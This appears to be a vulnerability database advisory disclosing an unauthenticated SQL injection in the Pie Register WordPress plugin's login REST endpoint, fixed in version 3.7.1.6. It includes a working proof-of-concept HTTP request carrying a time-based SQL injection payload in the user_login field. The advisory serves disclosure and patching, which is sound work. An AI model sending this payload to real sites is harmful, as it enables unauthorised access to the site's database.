Pie Register < 3.7.1.6 - Unauthenticated SQL Injection
Description
The plugin does not properly escape user data before using it in a SQL statement in the wp-json/pie/v1/login REST API endpoint, leading to an SQL injection.
Proof of Concept
POST /wp-json/pie/v1/login HTTP/1.1 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 43 Connection: close user_login='%20OR%20SLEEP(1)--&login_pass=a
Affects Plugins
Fixed in version 3.7.1.6✓
References
Classification
Miscellaneous
Original Researcher
AyeCode Ltd
Submitter
Stiofan
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-10-11 (about 3 months ago)
Added
2021-10-11 (about 3 months ago)
Last Updated
2021-10-11 (about 3 months ago)